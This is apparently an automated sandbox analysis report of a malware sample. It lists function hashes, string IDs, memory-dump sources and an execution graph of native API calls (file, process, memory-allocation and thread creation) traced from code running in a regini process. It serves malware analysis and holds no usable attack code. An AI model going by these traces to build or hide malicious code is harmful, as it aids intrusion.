                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE$XD:.$XD:.
                                                                              • API String ID: 0-1677842498
                                                                              • Opcode ID: 62d54d806f71639d8d3af76449606d919f60d6597b92e4aeda0fcdf8c676b9fc
                                                                              • Instruction ID: 34a1350193022345e317bdf0057a9515a85d69199e1aeba7e7cbdb2d7a77d9b5
                                                                              • Opcode Fuzzy Hash: 62d54d806f71639d8d3af76449606d919f60d6597b92e4aeda0fcdf8c676b9fc
                                                                              • Instruction Fuzzy Hash: E5415D759112597EEB11EB90DC81FEF773CFF95A00F004149FA057E1A0EB75AA0287A6
                                                                              Function 034F9987 Relevance: 7.6, Strings: 6, Instructions: 120COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE$XD:.$XD:.
                                                                              • API String ID: 0-1677842498
                                                                              • Opcode ID: 8e6885b01575a6729d8689aa2323eccb059b13bee3262ecc4ef7bf0381ff8a4c
                                                                              • Instruction ID: 462a8b5ffc4839fa53b5ed858019e9dd121ca9c090aa567c132939df76b1dada
                                                                              • Opcode Fuzzy Hash: 8e6885b01575a6729d8689aa2323eccb059b13bee3262ecc4ef7bf0381ff8a4c
                                                                              • Instruction Fuzzy Hash: 91317E759112597EEB11EB90DC81FEF773CEF95A00F004149FA057E1A0D775AA0287A6
                                                                              Function 034FA3FA Relevance: 6.5, Strings: 5, Instructions: 237COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $`}<7$e$h$o
                                                                              • API String ID: 0-2995952733
                                                                              • Opcode ID: 047fd78c671184de5f9a6cf2aa3abd91e312f719a904878debe96a41bf71e268
                                                                              • Instruction ID: 4ee547ef091f7ecdc17401af384221e727c216161c3640df56c5aa3fb5a4782b
                                                                              • Opcode Fuzzy Hash: 047fd78c671184de5f9a6cf2aa3abd91e312f719a904878debe96a41bf71e268
                                                                              • Instruction Fuzzy Hash: 8E8150B6C002186ADB25DB94DC84FFF737DBF88300F44869AE6096A150EA755B848FA5
                                                                              Function 034F9E3A Relevance: 6.4, Strings: 5, Instructions: 200COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $i$l$o$u
                                                                              • API String ID: 0-2051669658
                                                                              • Opcode ID: ab46685ea34c8d3c75c8e67f961343ca07c9c270b388967d977a32c1fac9b82c
                                                                              • Instruction ID: 453f2625dd45b46a8a6fd2fbb38ae18c368b5be9d325c1f7a307a13e6079f86e
                                                                              • Opcode Fuzzy Hash: ab46685ea34c8d3c75c8e67f961343ca07c9c270b388967d977a32c1fac9b82c
                                                                              • Instruction Fuzzy Hash: F76142B6900308AFDB24DFA4DC84FEFB7FDAB48700F14455DE6199B240E735AA418B64
                                                                              Function 034F9E36 Relevance: 6.4, Strings: 5, Instructions: 126COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $i$l$o$u
                                                                              • API String ID: 0-2051669658
                                                                              • Opcode ID: 756bd469d596b9040ed278f3e6af6232d383c50487815e26453ba8a9dab5239a
                                                                              • Instruction ID: 3f0f1adb0d93ca0a34231355bbab7f720d93cd539839e7d7ad6ef5fdd566d007
                                                                              • Opcode Fuzzy Hash: 756bd469d596b9040ed278f3e6af6232d383c50487815e26453ba8a9dab5239a
                                                                              • Instruction Fuzzy Hash: 2E413CB5900309AFCB20DFA5CC84FEFBBF9EB88700F144559E619AB240D735AA458B64
                                                                              Function 034FA3F1 Relevance: 6.4, Strings: 5, Instructions: 109COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $`}<7$e$h$o
                                                                              • API String ID: 0-2995952733
                                                                              • Opcode ID: 39ffafe38e7f169843488abc0ba88b9eaeadeed037f114a7de7ccf008752fdc7
                                                                              • Instruction ID: 3c3c4e4fb61b24674bf73a8b492f9390ba3b7c1487012ee5398a3660331dfca4
                                                                              • Opcode Fuzzy Hash: 39ffafe38e7f169843488abc0ba88b9eaeadeed037f114a7de7ccf008752fdc7
                                                                              • Instruction Fuzzy Hash: 0F41A172C04318AADB14DBA4DC44FEEB778EF48300F4482DAE50CAB150EB755B888F95
                                                                              Function 034F5C8A Relevance: 6.3, Strings: 5, Instructions: 88COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: -$4$7$K$n
                                                                              • API String ID: 0-870729904
                                                                              • Opcode ID: 44880f5cca87af0bfcac512ce814f93f8d0dcbd790bd1118e3a7d6b7f06f219a
                                                                              • Instruction ID: f85f83dea920aadc060c0c7dcb076f7e3120669ea58e6f4bc519a23a45dc7444
                                                                              • Opcode Fuzzy Hash: 44880f5cca87af0bfcac512ce814f93f8d0dcbd790bd1118e3a7d6b7f06f219a
                                                                              • Instruction Fuzzy Hash: 573171B5900219BBDB04DBA4DC41FEF73B8FF44304F048198E908AB280E776AE458BE5
                                                                              Function 034F9ACA Relevance: 5.3, Strings: 4, Instructions: 302COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $e$k$o
                                                                              • API String ID: 0-3624523832
                                                                              • Opcode ID: 78fa671354e13a79581fac346973dc85d0ce1f5460e9580bc8d6460be4cf8ea4
                                                                              • Instruction ID: bbd153a545228757d40b8a0371f737e512aaa08deeafac8cb437ae066913c0fa
                                                                              • Opcode Fuzzy Hash: 78fa671354e13a79581fac346973dc85d0ce1f5460e9580bc8d6460be4cf8ea4
                                                                              • Instruction Fuzzy Hash: 01B11BB5A00708AFDB24DBA4CC84FEFB7FDAF88700F148559F6199B280D775AA418B50
                                                                              Function 034F9AC7 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $e$k$o
                                                                              • API String ID: 0-3624523832
                                                                              • Opcode ID: 55d497db76a058dfbbaf498d0c24dc318a361b055d5e613071fadb163fed12ad
                                                                              • Instruction ID: 95c3762dfbd12808979852817cdd5c18e764258a6c8e42eacf4286b8e371aedc
                                                                              • Opcode Fuzzy Hash: 55d497db76a058dfbbaf498d0c24dc318a361b055d5e613071fadb163fed12ad
                                                                              • Instruction Fuzzy Hash: 8D612BB5A00308AFDB54DFA5CC84FEFB7BDAF89700F148559E6199B284D731AA41CB60
                                                                              Function 034F70AA Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $e$k$o
                                                                              • API String ID: 0-3624523832
                                                                              • Opcode ID: aa728dcfc576523440c368e4b4f6c831cab588264d65d35986e3c5fe40eedf1f
                                                                              • Instruction ID: 151e14d49297ed757e2644b2a8a2f9ffdacb367881cc79e2a2eb746e8069245e
                                                                              • Opcode Fuzzy Hash: aa728dcfc576523440c368e4b4f6c831cab588264d65d35986e3c5fe40eedf1f
                                                                              • Instruction Fuzzy Hash: 950184B2900318ABDB14DF99D884ADEF7B9FF48314F048259E9195F241E7729949CBB0

                                                                              Execution Graph

                                                                              Execution Coverage:2.6%
                                                                              Dynamic/Decrypted Code Coverage:4.3%
                                                                              Signature Coverage:2.3%
                                                                              Total number of Nodes:440
                                                                              Total number of Limit Nodes:71
                                                                              execution_graph 95808 2409e40 95811 240a1ac 95808->95811 95809 240a674 95811->95809 95812 242b3e0 95811->95812 95813 242b406 95812->95813 95818 2404080 95813->95818 95815 242b412 95817 242b44b 95815->95817 95821 2425830 95815->95821 95817->95809 95825 2413530 95818->95825 95820 240408d 95820->95815 95822 2425891 95821->95822 95824 242589e 95822->95824 95849 2411d10 95822->95849 95824->95817 95826 241354a 95825->95826 95828 2413563 95826->95828 95829 242a120 95826->95829 95828->95820 95831 242a13a 95829->95831 95830 242a169 95830->95828 95831->95830 95836 2428d30 95831->95836 95837 2428d4d 95836->95837 95843 2b82c0a 95837->95843 95838 2428d79 95840 242b780 95838->95840 95846 2429a50 95840->95846 95842 242a1df 95842->95828 95844 2b82c1f LdrInitializeThunk 95843->95844 95845 2b82c11 95843->95845 95844->95838 95845->95838 95847 2429a6d 95846->95847 95848 2429a7e RtlFreeHeap 95847->95848 95848->95842 95850 2411d4b 95849->95850 95865 24181b0 95850->95865 95852 2411d53 95863 2412023 95852->95863 95876 242b860 95852->95876 95854 2411d69 95855 242b860 RtlAllocateHeap 95854->95855 95856 2411d7a 95855->95856 95857 242b860 RtlAllocateHeap 95856->95857 95858 2411d8b 95857->95858 95864 2411e22 95858->95864 95890 2416d50 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 95858->95890 95861 2411fd2 95886 2428170 95861->95886 95863->95824 95879 2414880 95864->95879 95866 24181db 95865->95866 95891 24180a0 95866->95891 95869 2418221 95872 241823d 95869->95872 95874 24296e0 NtClose 95869->95874 95870 2418209 95871 2418214 95870->95871 95897 24296e0 95870->95897 95871->95852 95872->95852 95875 2418233 95874->95875 95875->95852 95905 2429a00 95876->95905 95878 242b87b 95878->95854 95881 24148a4 95879->95881 95880 24148ab 95880->95861 95881->95880 95883 24148ca 95881->95883 95908 242cc00 LdrLoadDll 95881->95908 95884 24148e0 LdrLoadDll 95883->95884 95885 24148f7 95883->95885 95884->95885 95885->95861 95887 24281d2 95886->95887 95888 24281df 95887->95888 95909 2412040 95887->95909 95888->95863 95890->95864 95892 24180ba 95891->95892 95896 2418196 95891->95896 95900 2428dd0 95892->95900 95895 24296e0 NtClose 95895->95896 95896->95869 95896->95870 95898 24296fd 95897->95898 95899 242970e NtClose 95898->95899 95899->95871 95901 2428dea 95900->95901 95904 2b835c0 LdrInitializeThunk 95901->95904 95902 241818a 95902->95895 95904->95902 95906 2429a1d 95905->95906 95907 2429a2e RtlAllocateHeap 95906->95907 95907->95878 95908->95883 95910 241204a 95909->95910 95926 2418480 95910->95926 95912 24125b3 95912->95888 95913 2412060 95913->95912 95930 24213a0 95913->95930 95916 2412275 95938 242c950 95916->95938 95917 24120bb 95917->95912 95933 242c820 95917->95933 95920 241228a 95922 24122d7 95920->95922 95944 2410b80 95920->95944 95922->95912 95923 2410b80 LdrInitializeThunk 95922->95923 95947 2418420 95922->95947 95923->95922 95924 2412425 95924->95922 95925 2418420 LdrInitializeThunk 95924->95925 95925->95924 95927 241848d 95926->95927 95928 24184b5 95927->95928 95929 24184ae SetErrorMode 95927->95929 95928->95913 95929->95928 95951 242b6f0 95930->95951 95932 24213c1 95932->95917 95934 242c830 95933->95934 95935 242c836 95933->95935 95934->95916 95936 242b860 RtlAllocateHeap 95935->95936 95937 242c85c 95936->95937 95937->95916 95939 242c8c0 95938->95939 95940 242b860 RtlAllocateHeap 95939->95940 95941 242c91d 95939->95941 95942 242c8fa 95940->95942 95941->95920 95943 242b780 RtlFreeHeap 95942->95943 95943->95941 95945 2410ba2 95944->95945 95958 2429970 95944->95958 95945->95924 95948 2418433 95947->95948 95963 2428c30 95948->95963 95950 241845e 95950->95922 95954 2429850 95951->95954 95953 242b721 95953->95932 95955 24298df 95954->95955 95957 2429878 95954->95957 95956 24298f5 NtAllocateVirtualMemory 95955->95956 95956->95953 95957->95953 95959 242998d 95958->95959 95962 2b82c70 LdrInitializeThunk 95959->95962 95960 24299b5 95960->95945 95962->95960 95964 2428ca8 95963->95964 95965 2428c58 95963->95965 95968 2b82dd0 LdrInitializeThunk 95964->95968 95965->95950 95966 2428ccd 95966->95950 95968->95966 95969 2417640 95970 2417658 95969->95970 95972 24176b2 95969->95972 95970->95972 95973 241b560 95970->95973 95974 241b586 95973->95974 95975 241b7b9 95974->95975 96000 2429ae0 95974->96000 95975->95972 95977 241b5fc 95977->95975 95978 242c950 2 API calls 95977->95978 95979 241b61b 95978->95979 95979->95975 95980 241b6f2 95979->95980 95981 2428d30 LdrInitializeThunk 95979->95981 95983 2415e60 LdrInitializeThunk 95980->95983 95988 241b711 95980->95988 95982 241b67d 95981->95982 95982->95980 95985 241b686 95982->95985 95983->95988 95984 241b6da 95989 2418420 LdrInitializeThunk 95984->95989 95985->95975 95985->95984 95986 241b6b8 95985->95986 96003 2415e60 95985->96003 96021 24249b0 LdrInitializeThunk 95986->96021 95987 241b7a1 95994 2418420 LdrInitializeThunk 95987->95994 95988->95987 96006 24288a0 95988->96006 95993 241b6e8 95989->95993 95993->95972 95995 241b7af 95994->95995 95995->95972 95996 241b778 96011 2428950 95996->96011 95998 241b792 96016 2428ab0 95998->96016 96001 2429afa 96000->96001 96002 2429b0b CreateProcessInternalW 96001->96002 96002->95977 96005 2415e9e 96003->96005 96022 2428f00 96003->96022 96005->95986 96007 2428917 96006->96007 96009 24288c8 96006->96009 96028 2b839b0 LdrInitializeThunk 96007->96028 96008 242893c 96008->95996 96009->95996 96012 2428978 96011->96012 96013 24289c7 96011->96013 96012->95998 96029 2b84340 LdrInitializeThunk 96013->96029 96014 24289ec 96014->95998 96017 2428b27 96016->96017 96019 2428ad8 96016->96019 96030 2b82fb0 LdrInitializeThunk 96017->96030 96018 2428b4c 96018->95987 96019->95987 96021->95984 96023 2428faa 96022->96023 96025 2428f2b 96022->96025 96027 2b82d10 LdrInitializeThunk 96023->96027 96024 2428fef 96024->96005 96025->96005 96027->96024 96028->96008 96029->96014 96030->96018 96031 24170c0 96032 24170ea 96031->96032 96035 2418250 96032->96035 96034 2417114 96036 241826d 96035->96036 96042 2428e20 96036->96042 96038 24182bd 96039 24182c4 96038->96039 96040 2428f00 LdrInitializeThunk 96038->96040 96039->96034 96041 24182ed 96040->96041 96041->96034 96043 2428eb5 96042->96043 96045 2428e48 96042->96045 96047 2b82f30 LdrInitializeThunk 96043->96047 96044 2428eee 96044->96038 96045->96038 96047->96044 96048 2429640 96049 24296b1 96048->96049 96051 2429668 96048->96051 96050 24296c7 NtDeleteFile 96049->96050 96321 242c880 96322 242b780 RtlFreeHeap 96321->96322 96323 242c895 96322->96323 96052 2419f45 96053 2419f50 96052->96053 96054 2419f79 96053->96054 96055 242b780 RtlFreeHeap 96053->96055 96055->96054 96056 2418b47 96058 2418b4a 96056->96058 96057 2418b01 96058->96057 96060 24173e0 96058->96060 96061 24173f6 96060->96061 96063 241742f 96060->96063 96061->96063 96064 2417250 LdrLoadDll LdrLoadDll 96061->96064 96063->96057 96064->96063 96065 241b050 96070 241ad60 96065->96070 96067 241b05d 96084 241a9e0 96067->96084 96069 241b073 96071 241ad85 96070->96071 96095 2418690 96071->96095 96074 241aed0 96074->96067 96076 241aee7 96076->96067 96077 241aede 96077->96076 96079 241afd5 96077->96079 96114 241a430 96077->96114 96081 241b03a 96079->96081 96123 241a7a0 96079->96123 96082 242b780 RtlFreeHeap 96081->96082 96083 241b041 96082->96083 96083->96067 96085 241a9f3 96084->96085 96092 241a9fe 96084->96092 96086 242b860 RtlAllocateHeap 96085->96086 96086->96092 96087 241aa1f 96087->96069 96088 2418690 GetFileAttributesW 96088->96092 96089 241ad32 96090 241ad48 96089->96090 96091 242b780 RtlFreeHeap 96089->96091 96090->96069 96091->96090 96092->96087 96092->96088 96092->96089 96093 241a430 RtlFreeHeap 96092->96093 96094 241a7a0 RtlFreeHeap 96092->96094 96093->96092 96094->96092 96096 24186b1 96095->96096 96097 24186b8 GetFileAttributesW 96096->96097 96098 24186c3 96096->96098 96097->96098 96098->96074 96099 24235a0 96098->96099 96100 24235ae 96099->96100 96101 24235b5 96099->96101 96100->96077 96102 2414880 2 API calls 96101->96102 96103 24235ea 96102->96103 96104 24235f9 96103->96104 96127 2423060 LdrLoadDll LdrLoadDll 96103->96127 96106 242b860 RtlAllocateHeap 96104->96106 96110 24237a4 96104->96110 96107 2423612 96106->96107 96108 242379a 96107->96108 96107->96110 96111 242362e 96107->96111 96109 242b780 RtlFreeHeap 96108->96109 96108->96110 96109->96110 96110->96077 96111->96110 96112 242b780 RtlFreeHeap 96111->96112 96113 242378e 96112->96113 96113->96077 96115 241a456 96114->96115 96128 241de30 96115->96128 96117 241a4c8 96119 241a650 96117->96119 96121 241a4e6 96117->96121 96118 241a635 96118->96077 96119->96118 96120 241a2f0 RtlFreeHeap 96119->96120 96120->96119 96121->96118 96133 241a2f0 96121->96133 96124 241a7c6 96123->96124 96125 241de30 RtlFreeHeap 96124->96125 96126 241a84d 96125->96126 96126->96079 96127->96104 96130 241de54 96128->96130 96129 241de61 96129->96117 96130->96129 96131 242b780 RtlFreeHeap 96130->96131 96132 241dea4 96131->96132 96132->96117 96134 241a30d 96133->96134 96137 241dec0 96134->96137 96136 241a413 96136->96121 96138 241dee4 96137->96138 96139 241df8e 96138->96139 96140 242b780 RtlFreeHeap 96138->96140 96139->96136 96140->96139 96141 241fad0 96142 241fb34 96141->96142 96170 24165f0 96142->96170 96144 241fc6e 96145 241fc67 96145->96144 96177 2416700 96145->96177 96147 241fe13 96148 241fe22 96150 24296e0 NtClose 96148->96150 96149 241fcea 96149->96147 96149->96148 96181 241f8b0 96149->96181 96152 241fe2c 96150->96152 96153 241fd26 96153->96148 96154 241fd31 96153->96154 96155 242b860 RtlAllocateHeap 96154->96155 96156 241fd5a 96155->96156 96157 241fd63 96156->96157 96158 241fd79 96156->96158 96159 24296e0 NtClose 96157->96159 96190 241f7a0 CoInitialize 96158->96190 96161 241fd6d 96159->96161 96162 241fd87 96193 24291b0 96162->96193 96164 241fe02 96165 24296e0 NtClose 96164->96165 96166 241fe0c 96165->96166 96167 242b780 RtlFreeHeap 96166->96167 96167->96147 96168 241fda5 96168->96164 96169 24291b0 LdrInitializeThunk 96168->96169 96169->96168 96171 2416623 96170->96171 96172 2416647 96171->96172 96197 2429250 96171->96197 96172->96145 96174 241666a 96174->96172 96175 24296e0 NtClose 96174->96175 96176 24166ec 96175->96176 96176->96145 96178 2416725 96177->96178 96202 2429040 96178->96202 96182 241f8cc 96181->96182 96183 2414880 2 API calls 96182->96183 96185 241f8ea 96183->96185 96184 241f8f3 96184->96153 96185->96184 96186 2414880 2 API calls 96185->96186 96187 241f9be 96186->96187 96188 2414880 2 API calls 96187->96188 96189 241fa18 96187->96189 96188->96189 96189->96153 96192 241f805 96190->96192 96191 241f89b CoUninitialize 96191->96162 96192->96191 96194 24291ca 96193->96194 96207 2b82ba0 LdrInitializeThunk 96194->96207 96195 24291fa 96195->96168 96198 242926d 96197->96198 96201 2b82ca0 LdrInitializeThunk 96198->96201 96199 2429299 96199->96174 96201->96199 96203 242905d 96202->96203 96206 2b82c60 LdrInitializeThunk 96203->96206 96204 2416799 96204->96149 96206->96204 96207->96195 96208 241c8d0 96210 241c8f9 96208->96210 96209 241c9fd 96210->96209 96211 241c9a3 FindFirstFileW 96210->96211 96211->96209 96213 241c9be 96211->96213 96212 241c9e4 FindNextFileW 96212->96213 96214 241c9f6 FindClose 96212->96214 96213->96212 96214->96209 96215 24125d0 96216 2428d30 LdrInitializeThunk 96215->96216 96217 2412606 96216->96217 96220 2429780 96217->96220 96219 241261b 96221 242980c 96220->96221 96223 24297ab 96220->96223 96225 2b82e80 LdrInitializeThunk 96221->96225 96222 242983d 96222->96219 96223->96219 96225->96222 96226 2429550 96227 24295f4 96226->96227 96229 242957b 96226->96229 96228 242960a NtReadFile 96227->96228 96230 24219d0 96231 24219ec 96230->96231 96232 2421a14 96231->96232 96233 2421a28 96231->96233 96234 24296e0 NtClose 96232->96234 96235 24296e0 NtClose 96233->96235 96236 2421a1d 96234->96236 96237 2421a31 96235->96237 96240 242b8a0 RtlAllocateHeap 96237->96240 96239 2421a3c 96240->96239 96325 2420390 96326 24203ad 96325->96326 96327 2414880 2 API calls 96326->96327 96328 24203cb 96327->96328 96241 2409de0 96242 2409def 96241->96242 96243 2409e30 96242->96243 96244 2409e1d CreateThread 96242->96244 96331 240b820 96332 242b6f0 NtAllocateVirtualMemory 96331->96332 96333 240ce91 96332->96333 96245 2417460 96246 241747c 96245->96246 96254 24174cf 96245->96254 96248 24296e0 NtClose 96246->96248 96246->96254 96247 2417607 96249 2417497 96248->96249 96255 2416880 NtClose LdrInitializeThunk LdrInitializeThunk 96249->96255 96251 24175e1 96251->96247 96257 2416a50 NtClose LdrInitializeThunk LdrInitializeThunk 96251->96257 96254->96247 96256 2416880 NtClose LdrInitializeThunk LdrInitializeThunk 96254->96256 96255->96254 96256->96251 96257->96247 96258 24110e0 96259 24110f9 96258->96259 96260 2414880 2 API calls 96259->96260 96261 2411117 96260->96261 96262 2411163 96261->96262 96263 2411150 PostThreadMessageW 96261->96263 96263->96262 96264 2428ce0 96265 2428cfd 96264->96265 96268 2b82df0 LdrInitializeThunk 96265->96268 96266 2428d25 96268->96266 96269 2428b60 96270 2428bec 96269->96270 96271 2428b8b 96269->96271 96274 2b82ee0 LdrInitializeThunk 96270->96274 96272 2428c1d 96274->96272 96275 2421d60 96278 2421d79 96275->96278 96276 2421e0c 96277 2421dc4 96279 242b780 RtlFreeHeap 96277->96279 96278->96276 96278->96277 96281 2421e07 96278->96281 96280 2421dd4 96279->96280 96282 242b780 RtlFreeHeap 96281->96282 96282->96276 96334 24262a0 96335 24262fa 96334->96335 96336 2426307 96335->96336 96338 2423cb0 96335->96338 96339 242b6f0 NtAllocateVirtualMemory 96338->96339 96341 2423cf1 96339->96341 96340 2423dfe 96340->96336 96341->96340 96342 2414880 2 API calls 96341->96342 96344 2423d37 96342->96344 96343 2423d80 Sleep 96343->96344 96344->96340 96344->96343 96283 2415f66 96284 2415f09 96283->96284 96285 2418420 LdrInitializeThunk 96284->96285 96286 2415f10 96284->96286 96285->96286 96288 2415f3c 96286->96288 96289 24183a0 96286->96289 96290 24183e4 96289->96290 96291 2418405 96290->96291 96296 2428a00 96290->96296 96291->96286 96293 24183f5 96294 2418411 96293->96294 96295 24296e0 NtClose 96293->96295 96294->96286 96295->96291 96297 2428a7a 96296->96297 96299 2428a2b 96296->96299 96301 2b84650 LdrInitializeThunk 96297->96301 96298 2428a9f 96298->96293 96299->96293 96301->96298 96345 2b82ad0 LdrInitializeThunk 96346 2412aaf 96347 2412ac2 96346->96347 96348 24165f0 2 API calls 96347->96348 96349 2412aca 96348->96349 96312 24293f0 96313 24294a1 96312->96313 96315 242941c 96312->96315 96314 24294b7 NtCreateFile 96313->96314 96350 2413433 96351 24180a0 2 API calls 96350->96351 96352 2413443 96351->96352 96353 24296e0 NtClose 96352->96353 96354 241345f 96352->96354 96353->96354

                                                                              Executed Functions

                                                                              Function 02409E40 Relevance: 29.1, Strings: 23, Instructions: 386COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 27 2409e40-240a1a5 28 240a1ac-240a1b3 27->28 29 240a1e5 28->29 30 240a1b5-240a1e3 28->30 31 240a1ec-240a1f8 29->31 30->28 32 240a217-240a221 31->32 33 240a1fa-240a215 31->33 34 240a232-240a23e 32->34 33->31 35 240a240-240a252 34->35 36 240a254-240a265 34->36 35->34 37 240a276-240a280 36->37 39 240a282-240a2d2 37->39 40 240a2d4-240a2e5 37->40 39->37 41 240a2f6-240a302 40->41 43 240a304-240a316 41->43 44 240a318-240a321 41->44 43->41 45 240a323-240a344 44->45 46 240a346-240a34f 44->46 45->44 48 240a355-240a370 46->48 49 240a57a-240a581 46->49 48->48 50 240a372-240a37c 48->50 51 240a5b3-240a5bd 49->51 52 240a583-240a5b1 49->52 54 240a38d-240a396 50->54 53 240a5ce-240a5d5 51->53 52->49 55 240a5e5-240a5ec 53->55 56 240a5d7-240a5e3 53->56 57 240a3a6-240a3b9 54->57 58 240a398-240a3a4 54->58 59 240a618-240a61f 55->59 60 240a5ee-240a616 55->60 56->53 62 240a3ca-240a3d6 57->62 58->54 66 240a621-240a631 59->66 67 240a686-240a68f 59->67 60->55 64 240a3d8-240a3ea 62->64 65 240a3ec-240a3fb 62->65 64->62 68 240a41d-240a427 65->68 69 240a3fd-240a416 65->69 66->66 71 240a633-240a63d 66->71 73 240a460-240a474 68->73 74 240a429-240a444 68->74 69->69 72 240a418 69->72 75 240a64e-240a657 71->75 72->49 80 240a485-240a48e 73->80 76 240a446-240a44a 74->76 77 240a44b-240a44d 74->77 78 240a659-240a662 75->78 79 240a66f call 242b3e0 75->79 76->77 81 240a45e 77->81 82 240a44f-240a458 77->82 83 240a664-240a66a 78->83 84 240a66d 78->84 88 240a674-240a684 79->88 86 240a490-240a4a0 80->86 87 240a4a2-240a4ae 80->87 81->68 82->81 83->84 92 240a63f-240a648 84->92 86->80 89 240a4b0-240a4cb 87->89 90 240a4cd-240a4d7 87->90 88->67 88->88 89->87 93 240a4e8-240a4f4 90->93 92->75 94 240a4f6-240a508 93->94 95 240a50a-240a514 93->95 94->93 97 240a525-240a52e 95->97 98 240a530-240a53f 97->98 99 240a541-240a54b 97->99 98->97 101 240a55c-240a568 99->101 102 240a575 101->102 103 240a56a-240a573 101->103 102->46 103->101
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: "$%$&f$.@$<|$?:$F$I>$V.$W$X}$bG$dg$e%V.$hr$jO$p4$v${${P${]$~$h
                                                                              • API String ID: 0-844827240
                                                                              • Opcode ID: ac7da862727fc6b8ce3562a83cbb3a05bdba5c06911e5096e2b802a0b0289dc5
                                                                              • Instruction ID: 906f3945e8d1105a18d2380485be95fb4fb8e1ee4b9d3c58c8c6247a564baf8f
                                                                              • Opcode Fuzzy Hash: ac7da862727fc6b8ce3562a83cbb3a05bdba5c06911e5096e2b802a0b0289dc5
                                                                              • Instruction Fuzzy Hash: 8A226CB0D05229CBEB24CF55C998BDDBBB1BB45308F1082EAC54D6B280D7B95AC9CF54
                                                                              Function 0241C8D0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindFirstFileW.KERNELBASE(?,00000000), ref: 0241C9B4
                                                                              • FindNextFileW.KERNELBASE(?,00000010), ref: 0241C9EF
                                                                              • FindClose.KERNELBASE(?), ref: 0241C9FA
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Find$File$CloseFirstNext
                                                                              • String ID:
